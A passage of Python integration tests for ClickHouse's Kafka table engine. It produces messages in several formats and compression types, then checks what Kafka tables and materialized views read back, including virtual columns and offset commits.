admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# The first consumer subscribes to the topic, tries to poll some data, and goes idle.
instance.query('SELECT * FROM test.kafka')
# The second consumer does the same, which leads to a rebalance in the first
# consumer; it also tries to poll some data.
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# The first consumer has a pending rebalance callback left unprocessed (no poll after the select).
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
    Checks that the materialized view works properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="recreate_kafka_table", num_partitions=6, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
    # 120 messages were produced before the drop and 120 after it, so once the offsets are committed the view should contain all 240 rows
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
    To trigger this regression there should be duplicated messages
    Original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': "localhost:{}".format(kafka_cluster.kafka_port)})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
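# The test above sets compression at the *topic* level ('compression.type' in the
# topic config), so the broker stores the data compressed regardless of what the
# producer sends. A minimal sketch of the other option, compressing on the
# producer side with kafka-python; which codecs are usable depends on the
# installed codec libraries (e.g. python-snappy, zstandard), so treat the codec
# argument as an assumption. Not used by the tests.
def produce_compressed(bootstrap_servers, topic, rows, codec='gzip'):
    producer = KafkaProducer(bootstrap_servers=bootstrap_servers,
                             compression_type=codec)  # 'gzip', 'snappy', 'lz4', 'zstd' or None
    for row in rows:
        producer.send(topic, value=row.encode('utf-8'))  # rows are JSONEachRow strings
    producer.flush()
    producer.close()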
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
    # Create batches of messages of size ~100 KB
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
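# test_kafka_insert above and test_kafka_produce_consume below retry the INSERT
# for as long as librdkafka reports 'Local: Timed out.'. A minimal sketch of that
# retry loop as a helper with a bounded number of attempts; the helper name and
# the attempt limit are illustrative assumptions (the tests themselves retry
# without a limit).
def insert_with_retry(run_query, insert_sql, max_attempts=20):
    for _ in range(max_attempts):
        try:
            run_query(insert_sql)
            return
        except QueryRuntimeException as e:
            if 'Local: Timed out.' in str(e):
                continue  # transient producer timeout, try again
            raise
    raise RuntimeError('INSERT kept timing out after {} attempts'.format(max_attempts))
# e.g. insert_with_retry(instance.query, "INSERT INTO test.kafka VALUES {}".format(values))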
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
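# Several tests here (test_kafka_commit_on_block_write above, test_kafka_rebalance,
# test_commits_of_unprocessed_messages_on_drop) share a counter with the producer
# thread through a one-element list like `i = [0]` instead of a plain int: a plain
# int would be rebound inside the closure and require `nonlocal`, while mutating
# the list element needs neither. A small self-contained illustration of the
# pattern (not used by the tests):
def _counter_closure_demo():
    counter = [0]          # shared mutable cell, same trick as `i = [0]` above
    stop = threading.Event()
    def produce():
        while not stop.is_set():
            counter[0] += 1  # mutate the cell, no rebinding, no `nonlocal`
    worker = threading.Thread(target=produce)
    worker.start()
    time.sleep(0.01)
    stop.set()
    worker.join()
    return counter[0]      # how many "messages" the worker produced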
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
    producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
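# The expected block above relies on the producer timestamps: timestamp_ms
# 1577836801001 is 2020-01-01 00:00:01.001 UTC, so _timestamp (second precision)
# becomes 1577836801 while _timestamp_ms keeps the milliseconds. A small check of
# that arithmetic (illustrative only, not used by the tests):
def _timestamp_expectations_demo():
    from datetime import datetime, timezone
    ts_ms = 1577836801001
    seconds = ts_ms // 1000                        # 1577836801, value of toUnixTimestamp(_timestamp)
    as_utc = datetime.fromtimestamp(seconds, tz=timezone.utc)
    assert as_utc == datetime(2020, 1, 1, 0, 0, 1, tzinfo=timezone.utc)
    assert ts_ms == seconds * 1000 + 1             # toUnixTimestamp64Milli(_timestamp_ms)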
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
